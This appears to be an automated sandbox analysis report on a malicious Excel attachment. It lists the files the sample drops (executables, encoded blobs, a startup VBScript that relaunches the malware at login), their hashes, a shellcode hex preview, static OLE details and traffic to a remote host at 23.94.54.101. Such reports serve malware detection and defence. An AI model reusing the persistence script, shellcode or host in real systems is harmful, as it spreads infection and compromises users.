SHA-256:	26939E2779D04E0E5CC020694B7EAF38525FD40E13E06DB165C08449A13FA347
SHA-512:	0D705C994C7405358EB5531A5A19CC8A1EC1CCF2E25D76CAA2C7A368DA474FC1E65B688E79F1D978B079057B99B9D43D3954AAFD32553276CE0595B12C366CF8
Malicious:	false
Preview:	EA06.........b.5.R..nO:.J.V+Up..i..M...Uh...P...Z..+U.?.w4.O.q\|M........V.8..h..=..9.Nf.Z_..P....j...B......(.....:8......_4X.LCm.m.QE.a..i'..6...r..\|sa.F......x-.9.....l...U.a.t.......<...;.H.r!..N..&.s..J.7.O....{...2.d,...3.4..1.X..3K.H........G.....gJ...U@..uf....o?.R....^.N.-.7.MiH..;.....6...J.^.I..@..}j.....i6....X.mf..$.m!..iUz.p.......;...:...q.........i_..j..... ._.=..V(@..7.L..@....SP...5B..g...M].Md....iJ.L..~..b.7.O.5Y.Vm6...)NUJ.L..x....?...B....l..\"..-6.4...........1Q..j.......%6i6.........t.V..i]N......@.i.V)....b....r...y.......(.<R&@...5D..d...c-l.-:...(.x.W..>8..............EH..2..;Z../si.O._!......I.p..z.......>+...<`X%f.5..6V{}>km.......4..x`...7.N&4..JO...+.)....L~...~.....I.&.s..P.j....oP.z...W#.X.cI.Rf..."....6QE2k\...sn...7.@.f2.....K.i0..#.....7.[._=U..h.x&.I.D.i..-Ri.7ez..5...2.I.3^.2.5.Z1?:d^;W.igSJUr.I.R.TKuf....4.P...E.Z; .M..j.R....B...@iSJ.J...w#V.b+..R...5....kUy...q.w#...*'.....gwsE.M...>i..X

C:\Users\user\AppData\Local\Temp\aut90BC.tmp

Download File

Process:	C:\Users\user\AppData\Local\silvexes\deblaterate.exe
File Type:	data
Category:	dropped
Size (bytes):	9916
Entropy (8bit):	7.600038819371061
Encrypted:	false
SSDEEP:	192:m+cKumbG02JtWU+F6xcj8DiqAEgADXuLKZRvVE8ZGD/Lr6mjNAEOLiX:97umbGRJtWjAuYipVkX2KZ/E8ZGD/XVf
MD5:	85EC07A5B813744D5460158A4F4C3B75
SHA1:	9A40D20BD37344BB771FA10D81E813397AEA3B90
SHA-256:	64B6B2C25F3830B385DC1E421742721FA60298892200EDF21BCC1DE44C9DDEFC
SHA-512:	0D591CF85239BC1E138DBE0A877F26FABB2EE5924BEA0195488FF7816DFDCEB2D6EF5A864A424004C82671EC57F41C455A774822A7A3D75341B44B5AD7A3099C
Malicious:	false
Preview:	EA06..t0.M'.)..e4.N'.).......T9..l.0L.s.5..3..s.4.8.......k8.Yls....c..&S...k6...S....1.L&.i..i5.M,S....K.@...7...p. ....P.o...m.X.V........9....3...f....s2.Xf@.]..g3@..h.m.M.......8.l..6.....a........i4........g3Y...c ._..k4...d....H, ......Ac.H..g...(.F..=d....>....C`....@02..N@...u......Y..ab.M.]>.$....M.x>;$....N.j.;%....X.j.;%......j.;,....P'.b.5... .^..f./Z..@F.6.z..G......`......i..G../Z...zqd...l.;.........\|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i\|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn......d...

C:\Users\user\AppData\Local\Temp\autC301.tmp

Download File

Process:	C:\Users\user\AppData\Local\silvexes\deblaterate.exe
File Type:	data
Category:	dropped
Size (bytes):	415558
Entropy (8bit):	7.980802161270596
Encrypted:	false
SSDEEP:	6144:B5V2kSfdEVJBkA8liRllAjk0/5F2m0SDEHPTmXWbdChTm+1hEDubJUoztcl8cC2h:rYkS1KWA8SbZ0F24gRsp1mD27tcy+
MD5:	6167A7957E72F9B3A53C5667A7C56057
SHA1:	00AC978BFF6FA30F4429ECD8810460642C5767B0
SHA-256:	26939E2779D04E0E5CC020694B7EAF38525FD40E13E06DB165C08449A13FA347
SHA-512:	0D705C994C7405358EB5531A5A19CC8A1EC1CCF2E25D76CAA2C7A368DA474FC1E65B688E79F1D978B079057B99B9D43D3954AAFD32553276CE0595B12C366CF8
Malicious:	false
Preview:	EA06.........b.5.R..nO:.J.V+Up..i..M...Uh...P...Z..+U.?.w4.O.q\|M........V.8..h..=..9.Nf.Z_..P....j...B......(.....:8......_4X.LCm.m.QE.a..i'..6...r..\|sa.F......x-.9.....l...U.a.t.......<...;.H.r!..N..&.s..J.7.O....{...2.d,...3.4..1.X..3K.H........G.....gJ...U@..uf....o?.R....^.N.-.7.MiH..;.....6...J.^.I..@..}j.....i6....X.mf..$.m!..iUz.p.......;...:...q.........i_..j..... ._.=..V(@..7.L..@....SP...5B..g...M].Md....iJ.L..~..b.7.O.5Y.Vm6...)NUJ.L..x....?...B....l..\"..-6.4...........1Q..j.......%6i6.........t.V..i]N......@.i.V)....b....r...y.......(.<R&@...5D..d...c-l.-:...(.x.W..>8..............EH..2..;Z../si.O._!......I.p..z.......>+...<`X%f.5..6V{}>km.......4..x`...7.N&4..JO...+.)....L~...~.....I.&.s..P.j....oP.z...W#.X.cI.Rf..."....6QE2k\...sn...7.@.f2.....K.i0..#.....7.[._=U..h.x&.I.D.i..-Ri.7ez..5...2.I.3^.2.5.Z1?:d^;W.igSJUr.I.R.TKuf....4.P...E.Z; .M..j.R....B...@iSJ.J...w#V.b+..R...5....kUy...q.w#...*'.....gwsE.M...>i..X

C:\Users\user\AppData\Local\Temp\autC3BE.tmp

Download File

Process:	C:\Users\user\AppData\Local\silvexes\deblaterate.exe
File Type:	data
Category:	dropped
Size (bytes):	9916
Entropy (8bit):	7.600038819371061
Encrypted:	false
SSDEEP:	192:m+cKumbG02JtWU+F6xcj8DiqAEgADXuLKZRvVE8ZGD/Lr6mjNAEOLiX:97umbGRJtWjAuYipVkX2KZ/E8ZGD/XVf
MD5:	85EC07A5B813744D5460158A4F4C3B75
SHA1:	9A40D20BD37344BB771FA10D81E813397AEA3B90
SHA-256:	64B6B2C25F3830B385DC1E421742721FA60298892200EDF21BCC1DE44C9DDEFC
SHA-512:	0D591CF85239BC1E138DBE0A877F26FABB2EE5924BEA0195488FF7816DFDCEB2D6EF5A864A424004C82671EC57F41C455A774822A7A3D75341B44B5AD7A3099C
Malicious:	false
Preview:	EA06..t0.M'.)..e4.N'.).......T9..l.0L.s.5..3..s.4.8.......k8.Yls....c..&S...k6...S....1.L&.i..i5.M,S....K.@...7...p. ....P.o...m.X.V........9....3...f....s2.Xf@.]..g3@..h.m.M.......8.l..6.....a........i4........g3Y...c ._..k4...d....H, ......Ac.H..g...(.F..=d....>....C`....@02..N@...u......Y..ab.M.]>.$....M.x>;$....N.j.;%....X.j.;%......j.;,....P'.b.5... .^..f./Z..@F.6.z..G......`......i..G../Z...zqd...l.;.........\|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i\|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn......d...

C:\Users\user\AppData\Local\Temp\bhvA870.tmp

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x2f8d0607, page size 32768, DirtyShutdown, Windows version 6.1
Category:	dropped
Size (bytes):	21037056
Entropy (8bit):	1.1388601254862936
Encrypted:	false
SSDEEP:	24576:oO1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:oOEXs1LuHqqEXwPW+RHA6m1fN
MD5:	83A46FAFD9B69282B8477939BC8D79D9
SHA1:	F282087DE8A3AAC3A42D007A04F30373104BCA5E
SHA-256:	0B8BDE9459B72FCF1AAB9179F13C5F42D533268035D8C556766F075B11821F58
SHA-512:	019F54272E61E2A32B559DB0AEA0431F5AC0EFBFF0134893BEF4A98F7496A4BD7731DC23FD7655947111A8A3FFA968149F1BA58F102C72ABC3A098BD0CD0245A
Malicious:	false
Preview:	/...... ........................u..............................;:...{.......\|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\disturb

Download File

Process:	C:\Users\user\AppData\Roaming\CKK.exe
File Type:	data
Category:	dropped
Size (bytes):	494592
Entropy (8bit):	7.519227488221947
Encrypted:	false
SSDEEP:	12288:21RC4HwaoZnJX1NpLh7MvRh+cnz3LbsUsVLLYn:d4zaJXdLh7gkcnzcZW
MD5:	1C497907667183BDB5AEFBAF2BB74A28
SHA1:	8DFD33CDF0751BBC78FB0F96799416CA6A06FB2E
SHA-256:	5DD4707D740D281210F4F9F7756E054F87D90B6DB0C4DB0D6F65E42210C6E441
SHA-512:	A37581C9BCA68617F3653CC5F35A41A00F9F8CB6BAC55C55C2A206E3AEEC2C8E02CAAC1C23C1337D9402F38F06EC0472B22094BFCB0D1A28A8701E4A35E03F19
Malicious:	false
Preview:	.n.ZTXL50J46..JJ.XZWXL54.4661JJ4XZWXL54J4661JJ4XZWXL54J4661JZ5XZYG.;4.=...K..y.?1?.D8[QDP'jW94978.V/.DC_j#Zx...lX[.Q.;<@n4XZWXL58..~.4\|..)...J.R.Hj..J.<q&...4.P.O...&...2\|.J.l#4..$...Jf..H..5F..)...K ..Hp..J...&...4A..O...'v..2.`J...4...%...Kf#W^~.44XZWXL54J4661JJ4..WX.43Jo..TJJ4XZWXL.4H5=7?JJF]ZWNN54J46.xIJ4HZWX.04J4v61ZJ4XXWXI55J4661OJ5XZWXL5.B4621JJ4XZUXL.4J$66!JJ4XJWX\54J466!JJ4XZWXL54J..01NK4XZ._L.~J4661JJ4XZWXL54J466.MJ.cZW..34r4661JJ4XZWXL54J4661..2XBWXLM.L4v61JJ4XZWXL54.16.5JJ4XZWXL54J4661JJ4XZWXL54J.BSI>J4X/&]L5$J46D4JJ0XZWXL54J4661JJ.XZ7v>QU>U66.3K4X.RXLO5J4@31JJ4XZWXL54J4v61.dP9.6XL5p.466!MJ4VZWX.34J4661JJ4XZWX.54..BZBJJ4XSWXL5DM4641JJ.^ZWXL54J4661JJtXZ.v+S].G66.HJ4X.PXL14J4611JJ4XZWXL54J4v61.dF+(4XL5..466.MJ4.ZWXH24J4661JJ4XZWX.54..DS]%)4X.lXL5.M46.1JJd_ZWXL54J4661JJtXZ.XL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J

C:\Users\user\AppData\Local\Temp\ppotysrwfeteuiatikevqdgejj

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	Unicode text, UTF-16, little-endian text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\AppData\Local\Temp\proximobuccal

Download File

Process:	C:\Users\user\AppData\Roaming\CKK.exe
File Type:	ASCII text, with very long lines (29744), with no line terminators
Category:	dropped
Size (bytes):	29744
Entropy (8bit):	3.547357781785406
Encrypted:	false
SSDEEP:	768:wiTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNb2E+Ix24vfF3if6gy6rE:wiTZ+2QoioGRk6ZklputwjpjBkCiw2Rl
MD5:	34F0F69B281BEFD351CFD575548C405E
SHA1:	BF1A53BE845395604BA157EF73ECC2881B5D59BB
SHA-256:	D59EE71397DCB4366353F472260A6178C00A79DD50562E440B4E8CB26090EEF9
SHA-512:	020C19E4CF6DEF3A80BC65257263D00BC365A90871B3E3EA90B02CD25B53F83FC081DA2443778ED9FDF11407E3F9BB6C2EED6343AB2CB414EAE84167F68B8686
Malicious:	false
Preview:	048B4C24088B008B093BC8760483C8FFC31BC0F7D8C38B0x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffffba6c0000006689957cffffffb86c00000066

C:\Users\user\AppData\Local\Temp\~$imgs.xlsx

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	false
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\AppData\Local\silvexes\deblaterate.exe

Download File

Process:	C:\Users\user\AppData\Roaming\CKK.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	115664384
Entropy (8bit):	7.999610134858133
Encrypted:	true
SSDEEP:	98304:OjTQYxsWRIEPpaELAHmk/vJ7mSL+6+J58:O3dxftPpawumkFZLcj8
MD5:	B0D8802F1660EDEC8682E3081795E3F1
SHA1:	7A58F476EF49834EB607B1BA331E4264478761EA
SHA-256:	1159BA594CDAC833A7FA2EBDCB9A5ABA1F95FF77EC3A5C170DB00BCE505799C6
SHA-512:	53E334C0936AF0644558EB07EAEF4C07E8D860A15DB77E53DA767E63C3F3391AB896AB0BC22BC4AB06F2C063CEB9F04673D0629062CDE16C16AAEDDAF8CA548C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L....b3f.........."..........6......w.............@..........................@............@...@.......@.....................d...\|....@..D{.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...D{...@...\|..................@..@.reloc...u.......v...p..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\CKK.exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1369600
Entropy (8bit):	7.252987156080183
Encrypted:	false
SSDEEP:	24576:GqDEvCTbMWu7rQYlBQcBiT6rprG8aRMWJLRH4NnPncMw:GTvC/MTQYxsWR7aRLNHWPp
MD5:	FA3641C75D2BEB68C01E8065EEFC4707
SHA1:	1A2F7C3BB7190F8D8E1685E4E1FD77EBECC699BA
SHA-256:	E28C8FC4052DBD472CC6245F605064F85EBB36371B43246066FDBECA547CBD17
SHA-512:	6624AF74D2F22E87FD2E2ACEE58D15CDA54A7888567C9625B7CEDF481008144B54E52668D3ED65DF46ED04D8EA59FC308D5DB6E9805D20B0C8B0278C81A19C0F
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 75% Antivirus: Virustotal, Detection: 65%, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L....b3f.........."..........6......w.............@..........................@............@...@.......@.....................d...\|....@..D{.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...D{...@...\|..................@..@.reloc...u.......v...p..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs

Download File

Process:	C:\Users\user\AppData\Local\silvexes\deblaterate.exe
File Type:	data
Category:	dropped
Size (bytes):	280
Entropy (8bit):	3.3852268556191687
Encrypted:	false
SSDEEP:	6:DMM8lfm3OOQdUfcltr1UEZ+lX1WlMg6DIAnriIM8lfQVn:DsO+vNlZ1Q1vgEPmA2n
MD5:	D269DA8CD923BD670E7335233BE3E822
SHA1:	A4BDA938DA1EB2220BBE64B968F970BE3E9C91C9
SHA-256:	D5649D8912C0C7F6D375D02A3DB4244A56D9434582563826FC2D68D06873029C
SHA-512:	437510A62BA0D95D8102D3F60A94D82B51D9295D6F048D38B5A04469F5014084F551DD9856D3DB1E5539C3D4B6AA66C876608C872527C1787044CD3074283BC4
Malicious:	true
Preview:	S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.s.i.l.v.e.x.e.s.\.d.e.b.l.a.t.e.r.a.t.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

C:\Users\user\AppData\Roaming\logs.dat

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	216
Entropy (8bit):	6.973834768285198
Encrypted:	false
SSDEEP:	6:u5J53JZaWJFP2U5Z7wqxJRhVR2SmIDYq1o55OEXM:233vJFPv5+qxJHqfIkqa5OEXM
MD5:	F60424C34B94C8E387872EEF9C7CEB8A
SHA1:	07047683236FAA51694218774C7E67F948DE026B
SHA-256:	F4E7096E48293890AB25B8CB6C888862781BA5DEBD2BF432968A9EF1C31AA289
SHA-512:	2E3A1F30C585BB166AF27E883241B844370FDAAA99F4145CF6003AA024EC7CAF666600C70E818AAACF72F4EFF54923FF74FAFA88C25643C49BB9A776F5352C39
Malicious:	false
Preview:	.D{6............x.X"..`...Y.N.}v..2E....-.....X5.q..i5&....mO..b....R....hV...5.r.M.z.C..@j.g.#....FPc..-r..[!........]........._.c......{..........V[-.P'*rs.v...%T&..^....I......,@........f..B.6/ZP.Tz.&.....

C:\Users\user\Desktop\~$202404294766578200.xlam.xls

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	false
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\Desktop\~$202404294766578200.xlam.xlsx

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	false
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Static File Info

General

File type:	Microsoft Excel 2007+
Entropy (8bit):	7.998374315459685
TrID:	Excel Microsoft Office Open XML Format document (40004/1) 83.33% ZIP compressed archive (8000/1) 16.67%
File name:	202404294766578200.xlam.xlsx
File size:	718'211 bytes
MD5:	17ed5ea9a21f03fbc7ded60afb7fa7ec
SHA1:	aa15371cc8f6b7da3e84aae222916ad8089cd747
SHA256:	8077345137e6ba83060605d6da78f97319552675bd79dd0ddf1beb0680b19899
SHA512:	32ac1c67366e31d9262a19866a0e844ac2c2df1345908e580b67bfaf6d106598440fc207ce4f9c3883544cd05b6480400b770d2e34126848b6299c032103619f
SSDEEP:	12288:o8nWYDl4ijM00YGT+L2bwrLh/4K3A1bM2FXvsyhwbRu8qra1eB2RVHdYs+lGKHqc:JHhj10YRL2sPt49PNqu/rkeB2Rl1I/8c
TLSH:	10E4334156A1DCCFA04B9A5FB4706BE8A4FA3A0290553A43D0BDDF98C919C8BE77C34D
File Content Preview:	PK.........8.X..[.............[Content_Types].xmlUT...3:3f3:3f3:3f.U.n.0....?..."......C...&@.C....h...q...R.."....E......V....b.!*g+rEg..+.T....._.5)b.Vr.,Td....\|.2..y...m.H....X.-....`1.r.....a...o.}..~0.l....9..\|.+..S....PI.,)...,U...V.'.....DJ.Z).....

File Icon


Icon Hash:	2562ab89a7b7bfbf

Static OLE Info

General

Document Type:	OpenXML
Number of OLE Files:	1

OLE File "202404294766578200.xlam.xlsx"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	False

Summary

Author:	SHINY
Last Saved By:	X10LUXURY
Create Time:	2010-06-04T08:55:28Z
Last Saved Time:	2023-07-30T22:56:25Z
Creating Application:	Microsoft Excel
Security:	0

Document Summary

Thumbnail Scaling Desired:	false
Company:	Grizli777
Contains Dirty Links:	false
Shared Document:	false
Changed Hyperlinks:	false
Application Version:	15.0300

Streams

Stream Path: \x1OlE10NAtiVe, File Type: data, Stream Size: 967044

General
Stream Path:	\x1OlE10NAtiVe
CLSID:
File Type:	data
Stream Size:	967044
Entropy:	5.971909664305237
Base64 Encoded:	False
Data ASCII:	m + . . m . . . . V q V . . 2 . > . h . M Z P . . e r - z d r 9 D . . 3 s 2 . . . . G ' . . ; . o a . . z . L . K . . A e . x x . p . h @ f : & # G . . g ~ . q . . . d 6 . . . . . x D ( . Y r . / . 3 . . G } C > x . ) . . U . 8 c ] N i L . P D . B . . $ . . G h Y . C k K . w Z . T . F Q M . . Q i . . k * 5 { Y . . . V . . . . Y . . r ; ? . & . . b / & f . b . ! r d A = . R . . 7 . I . . X . ! . 8 . " . 9 9 Q B q . . . " \| N 4 . P . 1 . 2 s p . ^ O - . B v J . C Q t g ` . _ > V H j 4 , . , V . 1 A ~ P !
Data Raw:	6d 2b e1 02 03 6d bf bf bd e5 01 08 1c 04 ba 56 71 56 e7 81 ea 1a b4 10 e7 8b 32 8b 06 bd 3e fe 95 06 81 f5 68 99 d3 06 8b 4d 5a 50 ff d1 05 11 65 72 e8 2d 7a 64 72 e8 ff e0 39 f6 44 00 05 96 33 73 c9 32 20 01 f9 b0 15 1f d0 ac 47 fe 27 c8 b9 f1 a4 ac b0 3b 8b 17 dd 6f 61 19 ee 16 7a 1f 4c b2 c2 aa 4b f4 09 aa 1c 41 65 93 16 d9 78 b6 78 1f 70 12 68 fd 40 8b f6 c8 66 3a 88 26 23 47

Stream Path: GaI, File Type: empty, Stream Size: 0

General
Stream Path:	GaI
CLSID:
File Type:	empty
Stream Size:	0
Entropy:	0.0
Base64 Encoded:	False
Data ASCII:
Data Raw:

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 4, 2024 10:02:37.698782921 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:37.909636974 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:37.909809113 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:37.910119057 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.122266054 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.122287035 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.122298002 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.122313976 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.122658968 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.334496021 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.334521055 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.334533930 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.334547043 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.334561110 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.334574938 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.334582090 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.334595919 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.334714890 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.334714890 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.334716082 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.545151949 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.545166969 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.545177937 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.545191050 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.545208931 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.545219898 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.545233965 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.545247078 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.545259953 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.545274019 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.545288086 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.545324087 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.545325041 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.545325041 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.545325041 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.545325041 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.545325041 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.545336962 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.545350075 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.545361042 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.545365095 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.545378923 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.545402050 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.545418978 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.547600985 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.755548000 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.755574942 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.755588055 CEST	80	49161	23.94.54.101	192.168.2.22
